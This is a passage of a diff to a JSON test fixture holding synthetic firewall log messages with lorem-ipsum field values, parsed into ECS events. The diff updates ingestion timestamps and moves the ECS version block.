sub_type=deri severity_level=quaeratv policy=involu src=10.70.7.23 src_port=2758 dst=10.130.240.11 dst_port=6515 http_method=odic http_url=iuta http_host=liquaUte http_agent=scivelit http_session_id=Nequ signature_subclass=quid signature_id=1044 srccountry=lloinve content_switch_name=borisnis server_pool_name=onorumet false_positive_mitigation=ptatema user_name=eavolup monitor_status=ipsumq http_refer=https://www.example.org/tno/iss.gif?ptatev=atu#teturad http_version=eturad dev_id=tDuis threat_weight=mwritten history_threat_weight=tat threat_level=equ ftp_mode=sumdolo ftp_cmd=idolorem cipher_suite=temvele msg_id=oremque", "event": { - "ingested": "2021-12-09T13:37:31.906963800Z" + "ingested": "2021-12-14T14:43:11.779400082Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=inimve devname=\"uio\" devid=\"mexercit\" vd=byC date=2017-3-4 time=11:21:59 logid=uae type=oremip subtype=its level=very-high eventtime=iavol logtime=natuserr srcip=10.37.161.101 srcport=1552 srcintf=enp0s6659 srcintfrole=evit dstip=10.111.182.212 dstport=4493 dstintf=lo6533 dstintfrole=lamco poluuid=tion sessionid=hender proto=icmp action=deny policyid=seq policytype=rumSe crscore=88.660000 craction=madmi crlevel=tlabore appcat=idunt service=expl srccountry=olore dstcountry=uian trandisp=atuserro tranip=10.17.209.252 tranport=2119 duration=135.770000 sentbyte=313 rcvdbyte=6509 sentpkt=oinBCS app=itsedd", "event": { - "ingested": "2021-12-09T13:37:31.906967700Z" + "ingested": "2021-12-14T14:43:11.779400469Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=ipis devname=\"itautfu\" devid=\"nesci\" vd=tam date=2017-3-18 time=6:24:33 logid=sin type=idexeac subtype=nimadmin level=medium eventtime=edutper logtime=tevelite srcip=10.158.175.98 srcport=1491 srcintf=enp0s7649 srcintfrole=oinBCSed dstip=10.170.196.181 dstport=6994 dstintf=enp0s5873 dstintfrole=obeatae poluuid=iquid sessionid=evo proto=udp action=allow policyid=mqu policytype=pteursi crscore=98.596000 craction=expl crlevel=essecill appcat=totamre service=rpo srccountry=velites dstcountry=nonpro trandisp=nula tranip=10.153.166.133 tranport=4638 duration=39.506000 sentbyte=6610 rcvdbyte=1936 sentpkt=olu app=imide", "event": { - "ingested": "2021-12-09T13:37:31.906971800Z" + "ingested": "2021-12-14T14:43:11.779400853Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-4-2 time=1:27:07 logver=amn devid=itessequ devname=porissu logid=umd type=sumd subtype=sectetur level=low vd=aUtenima srcip=10.62.10.137 srcport=5596 srcintf=lo6539 dstip=10.138.249.251 dstport=630 dstintf=eth1576 poluuid=deritinv sessionid=evelite proto=6 action=accept policyid=stiaecon trandisp=usBono duration=155.835000 sentbyte=3942 rcvdbyte=5360 devtype=ttenb osname=olor osversion=1.5978 mastersrcmac=lapa srcmac=01:00:5e:b0:3e:44 crscore=105.845000 craction=lors crlevel=oluptat eventtype=enimad user=tis service=qua hostname=con6049.internal.lan profile=quelaud reqtype=luptat url=https://internal.example.com/temse/caecat.jpg?emeu=tatemac#quisn direction=inbound msg=teursint method=etMa cat=llita catdesc=ntsunt device_id=nturmag log_id=uredol pri=high userfrom=temsequi adminprof=mquia timezone=ET main_type=enbyCic trigger_policy=iveli sub_type=conseq severity_level=itame policy=tenat src=10.63.171.91 src_port=4396 dst=10.48.25.200 dst_port=5179 http_method=nse http_url=mveniam http_host=tuser http_agent=mmo http_session_id=eve signature_subclass=nbyCicer signature_id=6129 srccountry=ciad content_switch_name=ugiatqu server_pool_name=eruntmo false_positive_mitigation=nimve user_name=usanti monitor_status=ion http_refer=https://mail.example.org/gelits/iavo.txt?udexerc=ovolupta#volup http_version=macc dev_id=ria threat_weight=beat history_threat_weight=rro threat_level=tuser ftp_mode=ctasu ftp_cmd=irat cipher_suite=sitame msg_id=oinven", "event": { - "ingested": "2021-12-09T13:37:31.906975400Z" + "ingested": "2021-12-14T14:43:11.779401300Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=ute dtime=2017-04-16 08:29:41.792538723 +0000 UTC devid=mexer devname=iam vd=Bonoru date=2017-4-16 time=8:29:41 logid=rcitati type=nula subtype=ameaquei level=low eventtime=adipi logtime=mquis srcip=10.174.17.46 srcport=2743 srcintf=eth6814 srcintfrole=ine dstip=10.77.105.81 dstport=4455 dstintf=enp0s7799 dstintfrole=orem poluuid=giatqu sessionid=rsint proto=udp action=allow policyid=paq policytype=uianon crscore=60.762000 craction=uisautem crlevel=mquameiu appcat=loremq service=turmagni srccountry=ores dstcountry=ddoe trandisp=uid tranip=10.38.168.190 tranport=7260 duration=129.140000 sentbyte=368 rcvdbyte=7791 sentpkt=incidi app=aedictas", "event": { - "ingested": "2021-12-09T13:37:31.906980Z" + "ingested": "2021-12-14T14:43:11.779401697Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=temaccus devname=\"ons\" devid=\"unt\" vd=liq date=2017-4-30 time=3:32:16 logid=abore type=iumdo subtype=oreeu level=high eventtime=exe logtime=tis srcip=10.36.99.207 srcport=4829 srcintf=lo497 srcintfrole=tvol dstip=10.225.37.73 dstport=5630 dstintf=eth1882 dstintfrole=eniamqu poluuid=iumt sessionid=porissus proto=udp action=cancel policyid=tsunt policytype=rnat crscore=88.508000 craction=ured crlevel=ctetu appcat=oreeu service=uasiarch srccountry=Malor dstcountry=boriosa trandisp=cillumdo tranip=10.166.142.198 tranport=4151 duration=1.040000 sentbyte=465 rcvdbyte=7663 sentpkt=oreetd app=lor", "event": { - "ingested": "2021-12-09T13:37:31.906986200Z" + "ingested": "2021-12-14T14:43:11.779402179Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=etc devname=\"eturadip\" devid=\"nost\" vd=atus date=2017-5-14 time=10:34:50 logid=tassitas type=obea subtype=velite level=medium eventtime=litse logtime=san srcip=10.66.90.225 srcport=4846 srcintf=lo4891 srcintfrole=moenimi dstip=10.214.156.161 dstport=3854 dstintf=eth1188 dstintfrole=ati poluuid=rauto sessionid=doloreeu proto=6 action=block policyid=eumfu policytype=docons crscore=3.408000 craction=eumf crlevel=roquisq appcat=uasi service=maveniam srccountry=uis dstcountry=lill trandisp=remeum tranip=10.145.194.12 tranport=1001 duration=25.398000 sentbyte=6452 rcvdbyte=6820 sentpkt=aturE app=umto", "event": { - "ingested": "2021-12-09T13:37:31.906991500Z" + "ingested": "2021-12-14T14:43:11.779402594Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=pariat devname=\"iutal\" devid=\"teturad\" vd=ese date=2017-5-29 time=5:37:24 logid=eddoei type=lorumw subtype=eca level=medium eventtime=nimve logtime=duntut srcip=10.6.242.108 srcport=3373 srcintf=lo3230 srcintfrole=qua dstip=10.156.208.5 dstport=7612 dstintf=lo1800 dstintfrole=quisn poluuid=pteu sessionid=uatD proto=0 action=cancel policyid=antiu policytype=velillum crscore=166.389000 craction=iatquovo crlevel=lapari appcat=Mal service=itinvo srccountry=snulap dstcountry=cidu trandisp=hilmol tranip=10.163.36.101 tranport=253 duration=72.488000 sentbyte=1880 rcvdbyte=4638 sentpkt=ident app=scip", "event": { - "ingested": "2021-12-09T13:37:31.906997600Z" + "ingested": "2021-12-14T14:43:11.779403114Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-6-12 time=12:39:58 devname=uamqu device_id=iusmodi log_id=esciun type=generic subtype=tasnul pri=medium devid=ccusant devname=epteurs logid=rmag type=quisquam subtype=eporroqu level=very-high vd=dit srcip=10.25.134.171 srcport=7867 srcintf=eth4543 dstip=10.43.235.230 dstport=2198 dstintf=lo4581 poluuid=BCSe sessionid=rem proto=0 action=allow policyid=eeufug trandisp=ntin duration=6.686000 sentbyte=5763 rcvdbyte=1048 devtype=cinge osname=tatem osversion=1.4713 mastersrcmac=eritqu srcmac=01:00:5e:ed:6b:57 crscore=10.603000 craction=nimip crlevel=iutaliq eventtype=olore user=onemul service=trudexe hostname=remeum2641.www5.corp profile=Quisa reqtype=quiav url=https://www5.example.com/elit/sam.htm?nevolu=unt#isni direction=outbound msg=ecillum method=olor cat=amei catdesc=doconseq device_id=conseq log_id=emve pri=very-high userfrom=tiu adminprof=wri timezone=GMT-07:00 main_type=asper trigger_policy=dictasun sub_type=psa severity_level=lorese policy=olupta src=10.220.148.127 src_port=6681 dst=10.68.233.163 dst_port=3126 http_method=itanimi http_url=onoru http_host=data http_agent=ugits http_session_id=ittenb signature_subclass=tobeatae signature_id=5617 srccountry=quis content_switch_name=exe server_pool_name=naa false_positive_mitigation=equat user_name=estiaec monitor_status=pitlabo http_refer=https://example.net/rcitat/ree.htm?ionofdeF=rsp#imipsa http_version=nostrum dev_id=autodita threat_weight=ntut history_threat_weight=temveleu threat_level=itametco ftp_mode=etcons ftp_cmd=etco cipher_suite=iuntN msg_id=utfugi", "event": { - "ingested": "2021-12-09T13:37:31.907003400Z" + "ingested": "2021-12-14T14:43:11.779403524Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=isnostru date=2017-6-26 time=7:42:33 log_id=nul devid=ntocca devname=trudex logid=tvol type=lup subtype=mipsamv level=medium vd=qua srcip=10.249.194.7 srcport=4987 srcintf=enp0s2282 dstip=10.57.116.17 dstport=90 dstintf=enp0s7442 poluuid=xcep sessionid=gnidol proto=0 action=allow policyid=uaeab trandisp=ptat duration=136.310000 sentbyte=1078 rcvdbyte=6196 devtype=eturadip osname=amquaera osversion=1.4481 mastersrcmac=equ srcmac=01:00:5e:00:fd:79 crscore=18.750000 craction=olesti crlevel=edquia eventtype=ihi user=undeomn service=ape hostname=itaspe3216.localdomain profile=onsecte reqtype=prehende url=https://example.org/porro/issu.htm?inculpa=ruredol#iadeseru direction=unknown msg=numq method=quae cat=periam catdesc=ain device_id=umiurer log_id=mquido pri=very-high userfrom=onorume adminprof=abill timezone=GMT+02:00 main_type=uov trigger_policy=mini sub_type=mve severity_level=tionev policy=uasiarch src=10.116.82.108 src_port=7276 dst=10.94.177.125 dst_port=6683 http_method=nimides http_url=olorsit http_host=naaliq http_agent=plica http_session_id=asiarc signature_subclass=lor signature_id=5152 srccountry=snula content_switch_name=pici server_pool_name=bori false_positive_mitigation=dipi user_name=ecatc monitor_status=quovolu http_refer=https://example.net/itse/sse.gif?lupt=quatur#dminim http_version=ptatevel dev_id=aperiame threat_weight=stenat history_threat_weight=uianonnu threat_level=tatiset ftp_mode=quira ftp_cmd=ciatisun cipher_suite=duntutl msg_id=nven", "event": { - "ingested": "2021-12-09T13:37:31.907009100Z" + "ingested": "2021-12-14T14:43:11.779403934Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-7-11 time=2:45:07 devname=saq device_id=asiarch log_id=ssuscipi type=generic subtype=utla pri=medium devid=tquovo devname=fugi logid=nse type=nesciu subtype=todit level=very-high vd=inrepreh srcip=10.14.192.162 srcport=2536 srcintf=enp0s4429 dstip=10.179.128.6 dstport=3375 dstintf=enp0s4580 poluuid=ptate sessionid=volupta proto=3 action=cancel policyid=utla trandisp=emi duration=171.651000 sentbyte=3313 rcvdbyte=7131 devtype=velites osname=oloremi osversion=1.4442 mastersrcmac=apari srcmac=01:00:5e:0c:fb:2b crscore=140.065000 craction=uel crlevel=fficiad eventtype=teirured user=nostru service=rcit hostname=mea6298.api.example profile=eumiu reqtype=tatevel url=https://mail.example.org/uamquaer/texplica.gif?sequa=lorum#suntexpl direction=inbound msg=Sedut method=tatis cat=audant catdesc=obeata device_id=uredol log_id=uptat pri=low userfrom=entorev adminprof=quuntur timezone=GMT+02:00 main_type=exercit trigger_policy=dexer sub_type=idolor severity_level=onpr policy=uira src=10.115.121.243 src_port=550 dst=10.113.152.241 dst_port=2330 http_method=ali http_url=udexerci http_host=uae http_agent=imveni http_session_id=econ signature_subclass=aborio signature_id=1122 srccountry=setquas content_switch_name=nbyCi server_pool_name=runtmoll false_positive_mitigation=busBon user_name=norumetM monitor_status=isno http_refer=https://internal.example.com/ameaq/Quis.html?lestiae=iav#umiure http_version=isiut dev_id=tin threat_weight=rporiss history_threat_weight=billoinv threat_level=etconse ftp_mode=nesciu ftp_cmd=mali cipher_suite=roinBCSe msg_id=eetdolor", "event": { - "ingested": "2021-12-09T13:37:31.907014800Z" + "ingested": "2021-12-14T14:43:11.779404393Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-7-25 time=9:47:41 logver=upt devid=equamni devname=atcupi logid=enima type=uptateve subtype=fugitsed level=medium vd=lorem srcip=10.68.159.207 srcport=3320 srcintf=enp0s7206 dstip=10.139.195.188 dstport=893 dstintf=enp0s6960 poluuid=lits sessionid=tvolu proto=17 action=accept policyid=ollitan trandisp=temseq duration=0.684000 sentbyte=3045 rcvdbyte=6863 devtype=edictasu osname=eturadi osversion=1.3804 mastersrcmac=edquiano srcmac=01:00:5e:09:79:f2 crscore=11.231000 craction=taevitae crlevel=tevel eventtype=tatemse user=gitsed service=agn hostname=iqu7510.internal.corp profile=equeporr reqtype=amremap url=https://www5.example.org/aqu/utemvele.gif?serrorsi=tsedquia#rsit direction=unknown msg=ntutlabo method=idex cat=nihilmo catdesc=reetdo device_id=xeaco log_id=taliqu pri=medium userfrom=hite adminprof=umfugi timezone=CT main_type=dminimve trigger_policy=remips sub_type=laboreet severity_level=uptate policy=tot src=10.49.82.45 src_port=435 dst=10.179.153.97 dst_port=1908 http_method=ade http_url=nihilmol http_host=nder http_agent=ano http_session_id=rumexer signature_subclass=eab signature_id=2387 srccountry=saquaeab content_switch_name=eli server_pool_name=rissusci false_positive_mitigation=ectetur user_name=dictasun monitor_status=inimv http_refer=https://api.example.org/volup/untNeq.htm?mremaper=uteirur#ntium http_version=ide dev_id=quunturm threat_weight=quovo history_threat_weight=quaturve threat_level=ntiumdol ftp_mode=conse ftp_cmd=aturve cipher_suite=edqui msg_id=tvolu", "event": { - "ingested": "2021-12-09T13:37:31.907020500Z" + "ingested": "2021-12-14T14:43:11.779404802Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=ore devname=\"lors\" devid=\"saute\" vd=ecillumd date=2017-8-8 time=4:50:15 logid=iumto type=sequatu subtype=tiumtot level=medium eventtime=mdoloree logtime=que srcip=10.98.52.184 srcport=7402 srcintf=eth3784 srcintfrole=ita dstip=10.99.55.115 dstport=1537 dstintf=eth855 dstintfrole=isnostru poluuid=iad sessionid=ngelits proto=tcp action=accept policyid=billoi policytype=reseo crscore=158.047000 craction=uov crlevel=pariat appcat=icaboNe service=boreetd srccountry=uir dstcountry=rumex trandisp=ectobea tranip=10.205.83.138 tranport=6239 duration=170.113000 sentbyte=3290 rcvdbyte=722 sentpkt=ibus app=lumdol", "event": { - "ingested": "2021-12-09T13:37:31.907026200Z" + "ingested": "2021-12-14T14:43:11.779405334Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=onnu devname=\"reprehe\" devid=\"metMa\" vd=emoen date=2017-8-22 time=11:52:50 logid=ptate type=mipsumqu subtype=turad level=high eventtime=billo logtime=doloremi srcip=10.197.128.162 srcport=2052 srcintf=lo6750 srcintfrole=ionof dstip=10.90.189.248 dstport=1293 dstintf=lo2402 dstintfrole=roi poluuid=reh sessionid=volup proto=prm action=allow policyid=iconsequ policytype=ueporr crscore=127.832000 craction=archite crlevel=tur appcat=ddo service=emp srccountry=inBC dstcountry=did trandisp=atcupi tranip=10.228.11.50 tranport=984 duration=3.401000 sentbyte=6907 rcvdbyte=422 sentpkt=mcol app=tion", "event": { - "ingested": "2021-12-09T13:37:31.907032400Z" + "ingested": "2021-12-14T14:43:11.779406030Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-9-6 time=6:55:24 devname=moll device_id=roinBCS log_id=odit type=event subtype=vol pri=low desc=aloru user=cteturad userfrom=modi msg=cip action=deny adom=ntoccae2859.www.test session_id=incididu", "event": { - "ingested": "2021-12-09T13:37:31.907038100Z" + "ingested": "2021-12-14T14:43:11.779406680Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-9-20 time=1:57:58 devname=uinesci device_id=otamr log_id=tsed type=generic subtype=rExc pri=medium devid=saute devname=umdol logid=rerepr type=ipiscin subtype=trudexe level=high vd=ineavol srcip=10.29.34.211 srcport=5638 srcintf=eth1805 dstip=10.161.15.82 dstport=6598 dstintf=enp0s5799 poluuid=aco sessionid=eFini proto=17 action=cancel policyid=mipsa trandisp=uas duration=118.122000 sentbyte=1737 rcvdbyte=6283 devtype=umexe osname=xce osversion=1.7318 mastersrcmac=suntex srcmac=01:00:5e:5b:68:89 crscore=29.865000 craction=rcitati crlevel=siutali eventtype=uiratio user=ficia service=orsit hostname=deFinibu3940.internal.lan profile=rautod reqtype=onorumet url=https://www5.example.com/etcon/chit.txt?erspici=itinvolu#adeserun direction=unknown msg=tinv method=Utenima cat=nse catdesc=umq device_id=enim log_id=oreve pri=low userfrom=snisiu adminprof=atem timezone=ET main_type=vento trigger_policy=litsed sub_type=ciun severity_level=rehender policy=tetura src=10.124.71.88 src_port=7540 dst=10.22.248.52 dst_port=6566 http_method=cons http_url=tinvolu http_host=ptat http_agent=amquisn http_session_id=Finibus signature_subclass=nsequat signature_id=3661 srccountry=scipi content_switch_name=rem server_pool_name=reh false_positive_mitigation=rsitame user_name=tcons monitor_status=squamest http_refer=https://mail.example.com/emveleum/siuta.html?ate=epteur#onproi http_version=usmodit dev_id=orese threat_weight=umdolore history_threat_weight=umqui threat_level=adipisci ftp_mode=eir ftp_cmd=ull cipher_suite=tlabor msg_id=itecto", "event": { - "ingested": "2021-12-09T13:37:31.907043800Z" + "ingested": "2021-12-14T14:43:11.779407234Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-10-4 time=9:00:32 logver=ametcons devid=velite devname=ipexeac logid=explicab type=samvolu subtype=teiru level=low vd=orinrep srcip=10.228.213.136 srcport=7247 srcintf=lo1719 dstip=10.185.107.27 dstport=2257 dstintf=enp0s4999 poluuid=iduntutl sessionid=mipsumd proto=udp action=block policyid=quelauda trandisp=rcit duration=166.303000 sentbyte=7229 rcvdbyte=6230 devtype=orese osname=evelite osversion=1.4895 mastersrcmac=oremipsu srcmac=01:00:5e:cd:f6:0e crscore=37.237000 craction=equunt crlevel=mto eventtype=iae user=dent service=Uten hostname=tatiset4191.localdomain profile=aconseq reqtype=mquamei url=https://api.example.org/fug/liquid.txt?ptate=lloi#nseq direction=external msg=isetqua method=ianonn cat=oluptas catdesc=doe device_id=quipex log_id=rchitect pri=very-high userfrom=Bonor adminprof=ipex timezone=PT main_type=upta trigger_policy=ivel sub_type=tmollita severity_level=tionofd policy=iatnula src=10.185.37.176 src_port=1859 dst=10.26.58.20 dst_port=2809 http_method=essequam http_url=undeo http_host=ficiade http_agent=uiinea http_session_id=uianonn signature_subclass=eavolupt signature_id=784 srccountry=elitsedq content_switch_name=liquam server_pool_name=sinto false_positive_mitigation=edi user_name=eumiure monitor_status=ore http_refer=https://internal.example.com/mSe/sis.gif?rchite=rcit#orumwri http_version=tiae dev_id=giat threat_weight=nculpa history_threat_weight=olupt threat_level=tvol ftp_mode=ostru ftp_cmd=mea cipher_suite=tuserror msg_id=agnama", "event": { - "ingested": "2021-12-09T13:37:31.907049800Z" + "ingested": "2021-12-14T14:43:11.779407749Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=deritq dtime=2017-10-19 04:03:07.172538723 +0000 UTC devid=boreetdo devname=teni vd=iin date=2017-10-19 time=4:03:07 logid=nostr type=luptatem subtype=tNequepo level=low eventtime=eumfug logtime=sper srcip=10.200.12.126 srcport=2347 srcintf=enp0s7374 srcintfrole=liqu dstip=10.14.145.107 dstport=4362 dstintf=enp0s7861 dstintfrole=aliq poluuid=utem sessionid=oreetd proto=HOPOPT action=block policyid=Nequepo policytype=edictas crscore=55.933000 craction=tur crlevel=borisnis appcat=elitsedd service=hitecto srccountry=loremi dstcountry=nven trandisp=isci tranip=10.250.231.196 tranport=5863 duration=4.105000 sentbyte=2763 rcvdbyte=5047 sentpkt=aquioff app=cip", "event": { - "ingested": "2021-12-09T13:37:31.907055500Z" + "ingested": "2021-12-14T14:43:11.779408183Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=onsequat dtime=2017-11-02 11:05:41.432538723 +0000 UTC devid=tiumd devname=atuse vd=imad date=2017-11-2 time=11:05:41 logid=tura type=equuntur subtype=rve level=high eventtime=mqua logtime=xer srcip=10.225.34.176 srcport=5569 srcintf=lo2867 srcintfrole=amquisn dstip=10.21.203.112 dstport=5930 dstintf=enp0s1294 dstintfrole=sum poluuid=lloinve sessionid=eni proto=HOPOPT action=cancel policyid=edquiac policytype=psamvolu crscore=80.314000 craction=unturma crlevel=iavol appcat=psumdol service=urautodi srccountry=equamni dstcountry=fugia trandisp=uptate tranip=10.103.36.192 tranport=1974 duration=129.001000 sentbyte=2801 rcvdbyte=2565 sentpkt=imidest app=citation", "event": { - "ingested": "2021-12-09T13:37:31.907061900Z" + "ingested": "2021-12-14T14:43:11.779408635Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=nof devname=\"usantiu\" devid=\"periam\" vd=remip date=2017-11-16 time=6:08:15 logid=dexea type=aturExc subtype=antiumto level=low eventtime=obe logtime=niamqu srcip=10.140.59.161 srcport=3599 srcintf=eth575 srcintfrole=tev dstip=10.5.67.140 dstport=5687 dstintf=enp0s6143 dstintfrole=intoc poluuid=obeataev sessionid=rrorsit proto=udp action=accept policyid=umquid policytype=olabo crscore=79.046000 craction=dolor crlevel=rsp appcat=quir service=giatqu srccountry=olors dstcountry=roid trandisp=lorum tranip=10.118.111.183 tranport=5410 duration=96.462000 sentbyte=6821 rcvdbyte=6222 sentpkt=mipsu app=nvol", "event": { - "ingested": "2021-12-09T13:37:31.907068800Z" + "ingested": "2021-12-14T14:43:11.779409079Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-12-1 time=1:10:49 logver=llu devid=quaUt devname=labor logid=oris type=tatemse subtype=uta level=very-high vd=tse srcip=10.170.104.148 srcport=5722 srcintf=lo259 dstip=10.60.92.40 dstport=5836 dstintf=enp0s4446 poluuid=dicons sessionid=BCSedutp proto=udp action=accept policyid=ritatise trandisp=nihilm duration=104.607000 sentbyte=6659 rcvdbyte=5351 devtype=isauteir osname=eritquii osversion=1.4493 mastersrcmac=uisno srcmac=01:00:5e:e9:ec:d5 crscore=34.736000 craction=itaed crlevel=invol eventtype=Loremips user=cidun service=tassitas hostname=nimadmi4084.api.home profile=eufugia reqtype=nor url=https://example.net/aturQui/tquii.html?uiac=squ#litess direction=unknown msg=involupt method=itempo cat=upt catdesc=rve device_id=amq log_id=abillo pri=high userfrom=ationem adminprof=Nem timezone=OMST main_type=ollita trigger_policy=dipisci sub_type=amnisiu severity_level=ptat policy=epr src=10.7.70.169 src_port=2514 dst=10.28.212.191 dst_port=1997 http_method=nostru http_url=Loremip http_host=veleumiu http_agent=rcita http_session_id=turad signature_subclass=sequamni signature_id=4799 srccountry=ollita content_switch_name=ectetu server_pool_name=radi false_positive_mitigation=ula user_name=itsed monitor_status=rad http_refer=https://internal.example.com/ididu/autodit.gif?seru=oriss#imadmin http_version=suntexpl dev_id=urve threat_weight=sBonoru history_threat_weight=everi threat_level=squ ftp_mode=emagnaal ftp_cmd=nih cipher_suite=ncididu msg_id=itati", "event": { - "ingested": "2021-12-09T13:37:31.907072900Z" + "ingested": "2021-12-14T14:43:11.779409621Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-12-15 time=8:13:24 logver=estla devid=ione devname=ecillum logid=maccu type=ame subtype=pitlabo level=very-high vd=urExc srcip=10.37.124.214 srcport=6919 srcintf=lo7727 dstip=10.37.111.228 dstport=7082 dstintf=enp0s20 poluuid=dmini sessionid=tquid proto=17 action=block policyid=iatisun trandisp=cto duration=144.899000 sentbyte=2372 rcvdbyte=7417 devtype=imadmini osname=iatisund osversion=1.6506 mastersrcmac=aUtenim srcmac=01:00:5e:28:0c:11 crscore=172.422000 craction=etdol crlevel=sed eventtype=uep user=ametco service=nde hostname=reprehe3525.www5.example profile=mquisno reqtype=eaco url=https://mail.example.org/mvele/teveli.htm?Nequepor=luptate#aturvel direction=internal msg=dexea method=sedquia cat=litesse catdesc=ntmo device_id=aliqu log_id=iqu pri=very-high userfrom=ationula adminprof=doconse timezone=CEST main_type=oreeufug trigger_policy=ptatems sub_type=tenima severity_level=emagnam policy=iaco src=10.148.197.60 src_port=5711 dst=10.143.144.52 dst_port=974 http_method=nvo http_url=lab http_host=sedqui http_agent=iuntNe http_session_id=tdolor signature_subclass=Ute signature_id=2191 srccountry=uepor content_switch_name=umSecti server_pool_name=eabil false_positive_mitigation=ibusB user_name=rporis monitor_status=etco http_refer=https://example.org/ereprehe/olu.html?liqu=ipsu#siarch http_version=itautfu dev_id=rrorsi threat_weight=ole history_threat_weight=odi threat_level=tper ftp_mode=olor ftp_cmd=corpo cipher_suite=commod msg_id=iumd", "event": { - "ingested": "2021-12-09T13:37:31.907077500Z" + "ingested": "2021-12-14T14:43:11.779410148Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=aborisn dtime=2017-12-29 15:15:58.472538723 +0000 UTC devid=onproid devname=sitv vd=equam date=2017-12-29 time=3:15:58 logid=bor type=ameaquei subtype=aeca level=very-high eventtime=aperiam logtime=ngelit srcip=10.217.145.137 srcport=5242 srcintf=enp0s6940 srcintfrole=orema dstip=10.22.149.132 dstport=7725 dstintf=lo7156 dstintfrole=neavolup poluuid=lits sessionid=Nemoen proto=0 action=block policyid=rur policytype=quaturve crscore=166.007000 craction=oeiusmod crlevel=uidolore appcat=iacon service=ncu srccountry=quaturve dstcountry=ciad trandisp=diconseq tranip=10.251.183.113 tranport=2604 duration=161.433000 sentbyte=5697 rcvdbyte=7299 sentpkt=eseosqu app=uptatem", "event": { - "ingested": "2021-12-09T13:37:31.907082700Z" + "ingested": "2021-12-14T14:43:11.779410594Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=uamnihil devname=\"nisi\" devid=\"imadm\" vd=siutali date=2018-1-12 time=10:18:32 logid=mfugi type=ceroinBC subtype=lorumw level=low eventtime=squir logtime=commod srcip=10.183.16.252 srcport=3150 srcintf=lo6718 srcintfrole=eabillo dstip=10.203.66.175 dstport=3904 dstintf=enp0s3868 dstintfrole=dipisciv poluuid=nsequun sessionid=hen proto=icmp action=accept policyid=velillum policytype=itamet crscore=123.013000 craction=hil crlevel=itl appcat=idolo service=ncidid srccountry=oid dstcountry=iarchit trandisp=volupt tranip=10.51.60.203 tranport=5315 duration=165.955000 sentbyte=7551 rcvdbyte=1519 sentpkt=ten app=Utenim", "event": { - "ingested": "2021-12-09T13:37:31.907087900Z" + "ingested": "2021-12-14T14:43:11.779411178Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-1-27 time=5:21:06 logver=uasiarch devid=iamquisn devname=magnama logid=reprehe type=citatio subtype=dolo level=medium vd=esciunt srcip=10.133.245.26 srcport=1727 srcintf=enp0s2674 dstip=10.76.87.30 dstport=2858 dstintf=enp0s2918 poluuid=remag sessionid=roinBCSe proto=HOPOPT action=accept policyid=labori trandisp=ditau duration=39.920000 sentbyte=5413 rcvdbyte=6650 devtype=tam osname=olu osversion=1.409 mastersrcmac=iut srcmac=01:00:5e:5c:c2:50 crscore=69.137000 craction=boris crlevel=ris eventtype=nisiuta user=utper service=uipexe hostname=ursint411.www.lan profile=gnamali reqtype=iumdo url=https://example.org/tem/iadeseru.jpg?olorsita=odoco#etc direction=internal msg=lamco method=natuser cat=Excepteu catdesc=omnis device_id=tati log_id=orinc pri=very-high userfrom=eturadi adminprof=cinge timezone=PT main_type=ira trigger_policy=niamq sub_type=quatD severity_level=nevol policy=lumquid src=10.157.14.165 src_port=7170 dst=10.61.200.105 dst_port=2813 http_method=tquov 